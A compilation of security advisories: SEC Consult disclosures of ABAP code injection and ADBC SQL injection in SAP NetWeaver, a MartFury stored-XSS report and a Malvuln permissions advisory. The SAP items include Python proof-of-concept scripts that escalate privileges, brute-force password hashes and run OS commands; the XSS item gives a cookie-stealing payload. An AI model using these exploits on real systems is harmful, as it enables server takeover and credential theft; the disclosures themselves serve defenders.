<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20211214-2 > ============================================================================== title: Remote ABAP Code Injection in IUUC_GENERATE_ACPLAN_DELIMITER product: SAP Netweaver vulnerable version: SAP DMIS in at least 2011_1_731 <= SP 0013 fixed version: see solution section below CVE number: n/a SAP SNote: 3089831 impact: Critical CVSS 3.1 Score: 9.1 CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H homepage: https://www.sap.com/ found: 2021-07-23 by: Raschin Tavakoli (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ============================================================================== Vendor description: ------------------- "SAP SE is a German multinational software corporation based in Walldorf, Baden-Württemberg, that develops enterprise software to manage business operations and customer relations. The company is especially known for its ERP software. SAP is the largest non-American software company by revenue, the world's third-largest publicly-traded software company by revenue, and the largest German company by market capitalization." Source: https://en.wikipedia.org/wiki/SAP Business recommendation: ------------------------ SAP® released the patch (SNote 3089831) and SEC Consult advises all SAP® customers to update their systems immediately. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: ----------------------------------- 1. Remote ABAP Code Injection in IUUC_GENERATE_ACPLAN_DELIMITER The function module IUUC_GENERATE_ACPLAN_DELIMITER allows creating and executing ABAP programs in the SAP internal /ILT/* and /1CADMC/* namespace. To do that it creates jobs that can be executed immediately or scheduled for a specific time in the future. An attacker with the authorizations for the function module is able to execute arbitrary code and take over the SAP application server. As the function module is remote enabled, it allows the attack to be performed remotely via RFC. In the majority of cases internal RFC communications are nowadays still found to be unencrypted. This increases the risk that attackers wiretap service account passwords. Once such user is hijacked, the attacker has gained all necessary prerequisites for further attacks as described in this advisory. Attack Prerequisites -------------------- 1. Remote ABAP Code Injection in IUUC_GENERATE_ACPLAN_DELIMITER The user must have at least the following authorization objects: S_DMIS: MBT_PR_ARE: SLOP (SAP Landscape Transformation) ACTVT: 03 (Display) S_BTCH_JOB: JOBACTION: RELE (Release Jobs) Further, authorization to perform function calls (S_RFC) have to be present. Alternatively for local execution, authorization to execute function modules via transaction SE37 would be necessary. Proof of concept: ----------------- 1. Remote ABAP Code Injection in IUUC_GENERATE_ACPLAN_DELIMITER As a proof of concept, a script was created that assigns the reference user SAP* to the attacker using the table REFUSER: * ************************************************************************** * #!/usr/bin/env python3 from pyrfc import Connection import time def print_usref(): conn_highpriv = Connection(ashost="XX.XX.XX.XX", sysnr="00", client="001", user="DEVELOPER", passwd="Sap123456", lang='EN') result = conn_highpriv.call('RFC_READ_TABLE', QUERY_TABLE='USREFUS', FIELDS=['MANDT', 'BNAME', 'REFUSER'], DELIMITER='|' ) column_values = [] for line in result['DATA']: data = line['WA'] if "TEST" in data: print(data) if __name__ == '__main__': mandt = {'000', '001'} # selected for demonstration purpose print("Before: USREFUS WHERE BNAME = 'TEST'") print_usref() conn = Connection(ashost="XX.XX.XX.XX", sysnr="00", client="001", user="TEST", passwd="Sap123456", lang='EN') result = conn.call('IUUC_GENERATE_ACPLAN_DELIMITER', I_REPORTNAME='/1LT/Z_EVIL', I_SCHED_IMMEDIATE='X', IT_CODE=["REPORT /1LT/Z_EVIL.", "UPDATE USREFUS SET REFUSER = 'SAP*' ", "WHERE BNAME = 'TEST'." "COMMIT WORK."] ) print("\nSending payload via IUUC_RECON_RC_COUNT_TABLE_BIG and waiting 5 seconds...\n") time.sleep(5) print("After: USREFUS WHERE BNAME = 'TEST'") print_usref() * ************************************************************************** * Running the code produces the following output: $> IUUC_GENERATE_ACPLAN_DELIMITER_poc.py Before: USREFUS WHERE BNAME = 'TEST' 001|TEST | Sending payload via IUUC_RECON_RC_COUNT_TABLE_BIG and waiting 5 seconds... After: USREFUS WHERE BNAME = 'TEST' 001|TEST |SAP* Vulnerable / tested versions: ----------------------------- This vulnerability has been tested on Netweaver 754 (Release), 0002 (SP-Level), SAP DMIS 2011_1_731, SAPK-11613INDMIS. Vendor contact timeline: ------------------------ 2021-10-20: Initial contact with vendor 2021-10-22: Vendor informs that the discussion has been taken up to the application team 2021-11-11: Vendor informs that issue was also fixed in SAP Note 3089831 2021-11-11: SEC Consult informs Vendor that SAP Note 3089831 fixes the vulnerability but that CVE and SAP Note description is wrong (No SQL Injection but ABAP Injection) 2020-12-14: Coordinated release of security advisory Solution: --------- SEC Consult advises all SAP® customers to implement SAP Security Note 3089831 immediately. Workaround: ----------- See SAP Note 3089831 Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Raschin Tavakoli / @2021 </code></pre>

<pre><code>Document Title: =============== MartFury Marketplace - Cross Site Scripting Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2282 Release Date: ============= 2022-02-17 Vulnerability Laboratory ID (VL-ID): ==================================== 2282 Common Vulnerability Scoring System: ==================================== 5.5 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Martfury is a clean & modern Laravel Ecommerce System for multipurpose online stores. With design clean and trendy, Martfury will make your online store look more impressive and attractive to viewers. Help increase the high conversion rate to buy products with your customers so quickly. Designed on the grid system, your site will look sharp on all screens. Mobile optimized design based on user experience, brings the best shopping experience for your customers. (Copy of the Homepage:https://codecanyon.net/item/martfury-multipurpose-laravel-ecommerce-system/29925223 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site scripting web vulnerability in the official MartFuryonline service web-application. Affected Product(s): ==================== Botble Product: MartFury - Online Service (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-08-22: Researcher Notification & Coordination (Security Researcher) 2021-08-23: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2022-02-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent cross site scripting web vulnerability has been discovered in the official MartFury online service web-application. The web vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerability is located in the products description and name parameters of the create function in the products module (martfury dashboard). Remote attackers with privileged account access (user to vendor by product) are able to inject own malicious products. After a product is saved any customer that buys the article executes the malicious inject payload on events like favorite & compare. On the request a confirm information is displayed on the left top of the application that executes the script code with persistent attack vector. The request method to inject is post and the attack vector is persistent located on the application-side. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Status Notifcation Vulnerable Input(s): [+] Name [+] Description Vulnerable Parameter(s): [+] name [+] description Affected Module(s): [+] Compare [+] Favorite Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Register an account 2. Move to vendor dashboard 3. Register an account 4. Go to products and create a product 5. Inject payload to name and description 6. Save by submit via post method request 7. Preview the public product 8. Click compare or the favorites button 9. Status displays and executes the malicious script code with persistent attack vector 10. Successful reproduce of the persistent web vulnerability! Exploitation: Payload <iframe src=evil.source onload=alert(document.cookie)> --- PoC Session Logs (POST) (Inject) [Name & Description] --- https://martfury.localhost:8080/vendor/products/create Host: martfury.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------312580254331809165411596595054 Content-Length: 4034 Origin:https://martfury.localhost:8080 Connection: keep-alive Referer:https://martfury.localhost:8080/vendor/products/create Cookie: botble_session=atJpdiI6ImhVNTAySnlXSWVJM01TbVlaenNZMHc9PSIsInZhbHVlIukefh843rz39zf3hf8f3eDBUa1lsSnlPNlpnNDBlY2RjZGRjZDIyIiwidGFnIjoiIn0%3D; botble_cookie_newsletter=1; cookie_for_consent=1; __stripe_sid=0c82eaf7-75c0-41d5-8fa9-ebdfe27637d7fd80f6; __stripe_mid=ce8c5fe9-89ae-44e2-bfc9-9deca5e9b2235ff290 _token=2uQCgRQYHVxjDaqc6dlyPHbaxG0IO0rcDIJgmQRf&name=>"<iframe src=evil.source onload=alert(document.cookie)>&slug=iframe-srca-onloadalertdocumentcookie-1&slug_id=0&model= BotbleEcommerceModelsProduct&description=>"<iframe src=evil.source onload=aler(document.cookie)>&content=&images=&sale_type=0&sku=&price=0&sale_price= &start_date=&end_date=&with_storehouse_management=0&quantity=0&allow_checkout_when_out_of_stock=0&stock_status=in_stock&weight=0&length=0&wide=0&height=0 &is_added_attributes=0&added_attributes[1]=1&related_products=&cross_sale_products=&seo_meta[seo_title]=&seo_meta[seo_description]=&submit=save&brand_id=0&tax_id=0&tag= - POST: HTTP/3.0 302 Found content-type: text/html; charset=UTF-8 location:https://martfury.localhost:8080/vendor/products set-cookie: botble_session=atJpdiI6ImhVNTAySnlXSWVJM01TbVlaenNZMHc9PSIsInZhbHVlIukefh843rz39zf3hf8f3eDBUa1lsSnlPNlpnNDBlY2RjZGRjZDIyIiwidGFnIjoiIn0%3D; --- PoC Session Logs (GET) (Execution) [Favorite & Compare] --- https://martfury.localhost:8080/stores/evil.source Host: martfury.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer:https://martfury.localhost:8080/stores/iframe-srca-onloadalertdocumentcookie Cookie: botble_session=atJpdiI6ImhVNTAySnlXSWVJM01TbVlaenNZMHc9PSIsInZhbHVlIukefh843rz39zf3hf8f3eDBUa1lsSnlPNlpnNDBlY2RjZGRjZDIyIiwidGFnIjoiIn0%3D; botble_cookie_newsletter=1; cookie_for_consent=1; __stripe_sid=0c82eaf7-75c0-41d5-8fa9-ebdfe27637d7fd80f6; __stripe_mid=ce8c5fe9-89ae-44e2-bfc9-9deca5e9b2235ff290 - GET: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 vary: Accept-Encoding cache-control: no-cache, private set-cookie: botble_session=atJpdiI6ImhVNTAySnlXSWVJM01TbVlaenNZMHc9PSIsInZhbHVlIukefh843rz39zf3hf8f3eDBUa1lsSnlPNlpnNDBlY2RjZGRjZDIyIiwidGFnIjoiIn0%3D; Reference(s): https://martfury.localhost:8080/stores/ https://martfury.localhost:8080/vendor/ https://martfury.localhost:8080/vendor/products/ https://martfury.localhost:8080/vendor/products/create Security Risk: ============== The security risk of the persistent cross site scripting vulnerability in the online service web-application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20211214-1 > ======================================================================= title: Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG product: SAP Netweaver vulnerable version: SAP DMIS 2011_1_731 SP 0013 fixed version: see solution section below CVE number: CVE-2021-33701 SAP Note: 3078312 impact: Critical CVSS 3.1 Score: 9.1 CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H homepage: https://www.sap.com/ found: 2021-07-16 by: Raschin Tavakoli (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "SAP SE is a German multinational software corporation based in Walldorf, Baden-Württemberg, that develops enterprise software to manage business operations and customer relations. The company is especially known for its ERP software. SAP is the largest non-American software company by revenue, the world's third-largest publicly-traded software company by revenue, and the largest German company by market capitalisation." Source: https://en.wikipedia.org/wiki/SAP Business recommendation: ------------------------ SAP® released the patch (SNote 3078312) and SEC Consult advises all SAP® customers to update their systems immediately. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: ----------------------------------- 1. Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) The IT_WHERE_CLAUSE parameter of the function module IUUC_RECON_RC_COUNT_TABLE_BIG is vulnerable to an ABAP Code Injection. Unfiltered user input is used to generate ABAP code dynamically via the GENERATE SUBROUTINE statement which then gets executed with a PERFORM statement. As the attacker can freely choose the characters that can be used in these fields, he can execute arbitrary ABAP code. As the affected function module is remote enabled, it allows attackers to perform remote attacks via RFC. Note that the vulnerable code part inside the function module has been changed in newer releases. The original code that was vulnerable to an ABAP Code Injection has been replaced with an ADBC driver call. Unfortunately, this change also introduced an SQL injection vulnerability, which was addressed in SNote 3078312. The issue has been reported in a separate SEC Consult advisory and can be viewed at the following URL: https://sec-consult.com/vulnerability-lab/advisory/remote-adbc-sql-injection-in-sap-netweaver Attack Prerequisites -------------------- 1. Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) First prerequisite is the authorization object S_DMIS (SAP SLO Data migration server) with at least the following settings: MBT_PR_ARE: SAP Landscape Transformation MBT_PR_LEV: (not needed to be set) ACTVT: 03 Display Note that it is common practice that authorization objects are (mis)configured with wildcards, which increases the likelihood of the vulnerability. Further, of course, authorization to perform function calls (S_RFC) has to be granted. In the majority of cases internal RFC communications are nowadays still found to be unencrypted. This increases the risk that attackers wiretap DMIS related account passwords. Once such user is hijacked, the attacker has gained all necessary prerequisites for further attacks as described in this advisory. Proof of concept: ----------------- 1. Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) As a proof of concept, a script was created that assigns the attacker himself the reference user DDIC inside the table REFUSER: * ************************************************************************** * #!/usr/bin/env python3 from pyrfc import Connection if __name__ == '__main__': mandt = {'000', '001'} # selected for demonstration purpose conn = Connection(ashost="XX.XX.XX.XX", sysnr="00", client="001", user="DEVELOPER", passwd="Sap123456", lang='EN') print("USREFUS before:") result = conn.call('RFC_READ_TABLE', QUERY_TABLE='USREFUS', FIELDS=['MANDT', 'BNAME', 'REFUSER'], DELIMITER='|' ) column_values = [] for line in result['DATA']: print(line['WA']) [ --- PoC partially removed --- ] print("\nSending payload ...\n") result = conn.call('RFC_READ_TABLE', QUERY_TABLE='USREFUS', FIELDS=['MANDT', 'BNAME', 'REFUSER'], DELIMITER='|' ) column_values = [] print("USREFUS after:") for line in result['DATA']: print(line['WA']) * ************************************************************************** * Running the code produces the following output: $> iuuc_generic_abap.py USREFUS before: 001|DEVELOPER | 001|BWDEVELOPER | 001|TEST | 001|E_TEST | 001|DDIC | 001|SAP* | Sending payload ... USREFUS after: 001|BWDEVELOPER | 001|TEST | 001|E_TEST | 001|DDIC | 001|SAP* | 001|DEVELOPER |DDIC Vulnerable / tested versions: ----------------------------- This vulnerability has been tested on SAP Netweaver 752, 0001 (SP-Level), SAPK-11616INDMIS (Support Package) SAP DMIS 2011_1_731. Vendor contact timeline: ------------------------ 2021-07-18: Contacting SAP Product Security Response Team through Web Portal https://www.sap.com/about/trust-center/security/incident-management.html ID SR-21-00018 has been assigned 2021-07-21: Vendor informs that the discussion has been taken up to the application team 2022-07-21: Vendor confirms vulnerability but marks it internally as a duplicate for CVE-2021-33701 (see our other advisory for this function module) 2021-11-17: SEC Consult sends final advisory to vendor and informs about release date 2021-12-14: Coordinated release of security advisory Solution: --------- SEC Consult advises all SAP® customers to implement SAP Security Note 3078312 immediately. Note that Security Note 3078312 contains no automatic correction instructions for customers who run systems with DMIS versions or Support Package levels lower than DMIS 2011 SP10 (2015). Please refer to the section workaround. Workaround: ----------- In lower SP levels, the correction can be applied manually by modifying function module IUUC_RECON_RC_COUNT_TABLE_BIG adding the following statement directly after the authorization check: ASSERT it_where_clause[] IS INITIAL. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Raschin Tavakoli / @2021 </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/1c255ef6fd44877700867f94a59875d2.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Email-Worm.Win32.Lama Vulnerability: Insecure Permissions Description: The malware writes a ".BAT" file with insecure permissions under c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Type: PE32 MD5: 1c255ef6fd44877700867f94a59875d2 Vuln ID: MVID-2022-0491 Disclosure: 02/16/2022 Exploit/PoC: C:\>cacls "Alma Destructora.bat" C:\Alma Destructora.bat BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\>dir "Alma Destructora.bat" Volume in drive C has no label. Directory of C:\ 02/10/2022 12:37 AM 48 Alma Destructora.bat 1 File(s) 48 bytes 0 Dir(s) 26,840,838,144 bytes free Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20211214-0 > ============================================================================== title: Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG product: SAP Netweaver vulnerable version: see vulnerable/tested versions section below fixed version: see solution section below CVE number: CVE-2021-33701 SAP SNote: 3078312 impact: Critical CVSS 3.1 Score: 9.1 CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H homepage: https://www.sap.com/ found: 2021-07-07 by: Raschin Tavakoli (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ============================================================================== Vendor description: ------------------- "SAP SE is a German multinational software corporation based in Walldorf, Baden-Württemberg, that develops enterprise software to manage business operations and customer relations. The company is especially known for its ERP software. SAP is the largest non-American software company by revenue, the world's third-largest publicly-traded software company by revenue, and the largest German company by market capitalisation." Source: https://en.wikipedia.org/wiki/SAP Business recommendation: ------------------------ SAP® released the patch (SNote 3078312) and SEC Consult advises all SAP® customers to update their systems immediately. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: ----------------------------------- 1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) The IT_WHERE_CLAUSE parameter of the function module IUUC_RECON_RC_COUNT_TABLE_BIG is vulnerable to an ADBC SQL Injection. The function is part of the package CNV_INC_PROCESSING_REMOTE inside the function module group IUUC_REMOTE. It is typically used to count table records in the context of logging table and trigger creations. ADBC is an API for the Native SQL interface of the AS ABAP that is based on ABAP Objects and can be used to pass Native SQL statements to the database interface. ADBC SQL injections are a very serious type of vulnerability as they allow attackers not only to access data directly at the database layer but also to break out of the current client context. Moreover, stacked queries can be used to perform arbitrary read/write commands. All of this leads to full compromise of the SAP application server. As the affected function module is remote enabled, it allows attackers to perform remote attacks via RFC. Note that the vulnerability was originally found by SEC Consult during a research on a system with DMIS in version DMIS 2011_1_731 SP 0013. In this version, the same parameter IT_WHERE_CLAUSE was vulnerable to an ABAP Command Injection. The vulnerability seems to have been fixed insufficiently, leaving behind this ADBC SQL Injection. The advisory can be viewed at the following URL: https://sec-consult.com/vulnerability-lab/advisory/remote-abap-code-injection-in-sap-netweaver/ Attack Prerequisites -------------------- 1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) First prerequisite is the authorization object S_DMIS (SAP SLO Data migration server) with at least the following settings: MBT_PR_ARE: SAP Landscape Transformation MBT_PR_LEV: (not needed to be set) ACTVT: 03 Display Note that it is common practice that authorization objects are (mis)configured with wildcards, which increases the likelihood of exploitation of the vulnerability. Further, authorization to perform function calls (S_RFC) has to be granted for remote exploitation or access to SE37 for local privilege escalation In the majority of cases internal RFC communications are nowadays still found to be unencrypted. This increases the risk that attackers wiretap account passwords. Once such user is hijacked, the attacker has gained all necessary prerequisites for further attacks as described in this advisory. Proof of concept: ----------------- 1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) Example A: Arbitrary Read As a proof of concept, a script was created to brute force the password hash of the SAP* users in client 000 while authenticated to client 001. This also demonstrates the possibility of breaking out of the current client context. For this example, a boolean based Blind SQL attack was used. In order to get the exploitation to work, an arbitrary existing table has to be specified for the parameter I_TABNAME (in this PoC ZDEMO_SOH was chosen). The following excerpt shows the source code of the script: * ************************************************************************** * #!/usr/bin/env python3 from pyrfc import Connection from string import ascii_letters def generate_alphabet(): alph = [] for c in ascii_letters: alph.append(c) for i in range(0,10): alph.append(str(i)) alph.append('+') alph.append('/') alph.append('=') return alph if __name__ == '__main__': final_str = "" conn = Connection(ashost="XX.XX.XX.XX", sysnr="00", client= "001", user= "Peter", passwd="Sap123456", lang='EN') alph = generate_alphabet() print("Brute Forcing SAP* password hash in client 000 ...") for i in range(16, 61): toggle = 0 for c in alph: where_clause = ("('" + c + "' IN (SELECT SUBSTRING(PWDSALTEDHASH," + str(i) + ",1) from USR02 WHERE BNAME='SAP*' AND MANDT='000'))") [ --- PoC partially removed --- ] if(result['ET_COUNT'][0]['RECCNT'] != 0): final_str += c print("{x-issha, 1024}" + final_str,end='\r') print ("\n") * ************************************************************************** * Running the code produces the following output: $> poc_iuuc_remote.py Brute Forcing SAP* password hash in client 000... {x-issha, 1024}DRM3SNvfwWWsDf71QYyx+5L0AkN3l0nyKgPjvlBsPqE= Example B: Arbitrary Write The next proof of concept demonstrates arbitrary write to the database by using stacked queries. The following payload inserts the password hash corresponding to the plaintext password "Test123" into the SAP* users of all clients and then authenticates with the user SAP* on the other client 000. Afterwards, the OS command "ip addr" is executed: * ************************************************************************** * #!/usr/bin/env python3 from pyrfc import Connection def read_ABAP_Report(): with open('X:\\test.abap') as file: content = file.readlines() content = [x.strip() for x in content] return content if __name__ == '__main__': final_str = "" conn = Connection(ashost="XX.XX.XX.XX", sysnr="00", client= "001", user= "Peter", passwd="Sap123456", lang='EN') where_clause = ( "1 = 1 ); UPDATE USR02 SET PWDSALTEDHASH = " "'{x-issha, 1024}voJRVT/rrJ31pxfmhb/zaBqhXA81CYKSnylMlKr/CkE=' " "WHERE BNAME = 'SAP*'; COMMIT WORK; --") [ --- PoC partially removed --- ] conn2 = Connection(ashost="XX.XX.XX.XX", sysnr="00", client= "000", user= "SAP*", passwd="Test123", lang='EN') inject = ['REPORT Z_TEST213.' 'DATA(c) = \'ip addr\'.', 'DATA t TYPE TABLE OF char255.', 'DATA l(250) TYPE c.', 'CALL \'SYSTEM\' ID \'COMMAND\' FIELD c ID \'TAB\' FIELD t.', 'LOOP AT t INTO l.', 'WRITE: / l.', 'ENDLOOP.'] params = {'PROGRAM':inject} result = conn2.call('/SAPDS/RFC_ABAP_INSTALL_RUN', **params) for x in result['WRITES']: print(x['ZEILE']) * ************************************************************************** * Running the code produces the following output: $> .\poc_iuuc_remote2.py 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default ql link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: enp0s3: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast state DOWN link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff 3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state U P grou link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff inet XX.XX.XX.XX/24 brd XX.XX.XX.255 scope global noprefixroute enp0s8 valid_lft forever preferred_lft forever inet6 fe80::a00:27ff:fec3:fa40/64 scope link valid_lft forever preferred_lft forever Vulnerable / tested versions: ----------------------------- This vulnerability has been tested on SAP Netweaver 752 SP-LEVEL 0004 DMIS Release 2011_1_731 SP-Level 0016 SP SAPK-11616INDMIS. According to the vendor, the following products / versions are affected: * SAPSCORE 125 < SAPK-12502INSAPSCORE * S4CORE 105 < SAPK-10503INS4CORE * S4CORE 104 < SAPK-10405INS4CORE * S4CORE 103 < SAPK-10307INS4CORE * S4CORE 102 < SAPK-10209INS4CORE * S4CORE 101 < SAPK-10111INS4CORE * S4CORE 100 * DMIS 2018_1_752 < SAPK-20106INDMIS * DMIS 2020 < SAPK-20202INDMIS * DMIS 2011_1_700 < SAPK-11321INDMIS * DMIS 2011_1_710 < SAPK-11421INDMIS * DMIS 2011_1_730 < SAPK-11521INDMIS * DMIS 2011_1_731 < SAPK-11621INDMIS * DMIS 2011_1_620 < SAPK-11121INDMIS * DMIS 2011_1_640 < SAPK-11221INDMIS Vendor contact timeline: ------------------------ 2021-07-08: Contacting SAP Product Security Response Team through Web Portal https://www.sap.com/about/trust-center/security/incident-management.html ID SR-21-00009 has been assigned 2021-07-19: Vendor confirms vulnerability 2021-08-10: SNote 3078312 with patch released 2021-11-17: SEC Consult sends final advisory to vendor and informs about release date 2021-11-18: SAP requests to obfuscate or remove PoC 2021-12-14: Coordinated release of security advisory Solution: --------- SEC Consult advises all SAP® customers to implement SAP Security Note 3078312 immediately. Note that Security Note 3078312 contains no automatic correction instructions for customers who run systems with DMIS versions or Support Package levels lower than DMIS 2011 SP10 (2015). 